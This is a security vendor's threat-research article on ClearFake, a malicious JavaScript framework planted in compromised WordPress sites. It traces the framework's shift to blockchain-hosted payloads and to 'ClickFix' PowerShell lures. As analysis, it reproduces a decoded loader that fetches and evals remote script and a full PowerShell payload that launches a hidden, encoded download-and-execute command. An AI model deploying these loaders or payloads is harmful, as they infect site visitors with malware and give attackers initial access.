ClearFake: Evolution Overview

ClearFake, a malicious Javascript framework that has been identified in the wild since mid-2023, has evolved its techniques multiple times since its inception. In addition to changing its technique of obtaining subsequent payloads—from basic requests to an attacker-controlled domain, to requests that use blockchain smart contracts—ClearFake has changed its social engineering techniques and final payloads, all of which will be further discussed in this article. What has remained constant, however, is its primary target: Wordpress sites.

Target: Wordpress Sites

Wordpress sites remain the target for operators using ClearFake. During research, Keep Aware's threat research function has observed vast numbers of ClearFake-compromised Wordpress sites. Aside from using Wordpress, sites that have been compromised appear to be regardless of industry, making ClearFake an opportunistic threat to any internet-browsing user.

Now Uses Blockchain

When first identifying these ClearFake-compromised sites, a researcher needed to look for a base64-encoded Javascript that made an XMLHTTPRequest to a second-stage Javascript payload, as shown below. This payload would start a sequence of obtaining more Javascript files, creating and injecting a full-page iframe element, which would display a fake browser update notice.

‍

const get_script=()=>{const request=new XMLHttpRequest();request.open('GET','https://hello-world-broken-dust-1f1c.brewasigfi1978.workers.dev/',false);request.send(null);return request.responseText;}\neval(get_script());

Code. The prior snippet of code, base64-decoded.

‍

However, ClearFake soon switched its technique for obtaining its subsequent payloads to using Binance Smart Chain (BSC) contracts, a blockchain technology offered by Binance. To interact with these contracts, the attacker injects a script element with the ethers library ( <script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>) into the compromised website. This attack is still observed encoding the malicious Javascript using base64, as shown in the below code snippet, though there have been more recent evidence that further obfuscation techniques are now being used.

‍

let provider=new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/")

Code. A snippet of code, base64-decoded, illustrating how the ethers library is initially used to interact with BSC contracts.

‍

Social Engineering Then: Fake Update, Malware

ClearFake began its original campaign displaying a fake 'update your browser' notice to an unsuspecting internet user. Additionally, the fake notice would be based upon the user's browser. In the below screenshot, the user was using a Chrome browser to view a compromised site.

‍

‍

Interestingly, in attempts to add to the fake notice's legitimacy, ClearFake uses two notable techniques. First, the fake notice is a full-screen iframe element, which entirely restricts the user from continuing to browse on the legitimate—but compromised—site, thus making the victim believe the notice that they need to update their browser to view the content on this site.

‍

‍

When the user hovers over the "Update [Browser]" prompt, the URL shown in the bottom-left of the browser's screen is the browser's legitimate website. For example, if Chrome is the browser used, then the URL would show as Google's domain, such as "https://www.google.com/intl/en_uk/chrome/". However, once the "Update [Browser]" button is clicked, the malicious Javascript will update the button's URL from the legitimate browser site to a location hosting a malicious executable file. Instead of a browser update being downloaded, the user inadvertently downloads malware.

‍

Social Engineering Now: Fake Error, PowerShell

The ClearFake campaign has since changed their social engineering tactics to now display a 'something went wrong' error that prompts the user to copy and paste the "fix" into a PowerShell terminal. This new campaign is also referred to as "ClickFix". The below screenshots illustrate the malintent prompt is also slightly customized based upon the browser.

‍

‍

‍

When the user clicks the "Copy Fix" button, JavaScript takes a base64-encoded string, decodes it, and puts it into the clipboard. All the user has to do is open PowerShell and paste the malicious code into the terminal, and the code will flush the device's DNS, clear the clipboard, create a new PowerShell process that is hidden from the user, and download and execute subsequent malware. Though some users may be confused or hesitant to follow through with this new prompt, end users that do will be inadvertently subverting security controls on their machine and unknowingly providing initial access to a bad actor.

‍

1	ipconfig /flushdns
2	
3	$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";
4	$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));
5	Invoke-Expression $MUI;
6	
7	[System.Diagnostics.Process]::Start("powershell", "-ep RemoteSigned -w 1 -enc `"JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=`"") | Out-Null;
8	
9	exit;
10	0

Code. Malicious base64-decoded PowerShell code from one compromised site that is copied into the user's clipboard and is ready to be pasted into a PowerShell terminal.

‍

Browser as Initial Access

So often, the browser is the channel through which threat actors are able to initially gain access to both personal and business devices. ClearFake, a malicious JavaScript framework that is injected into otherwise-legitimate WordPress sites, is one example of web-based campaigns that attempts both to subvert technical controls by leveraging legitimate domains and to socially engineer end users to providing an attacker initial access by downloading malware or, in recent campaigns, by pasting malicious commands into a terminal.

The browser remains a channel often overlooked by most organizations, which is why Keep Aware continues to develop protections against browser-based attacks early in their attack chain and prevent people-targeted attacks. To learn more about the Keep Aware solution, talk to our team today.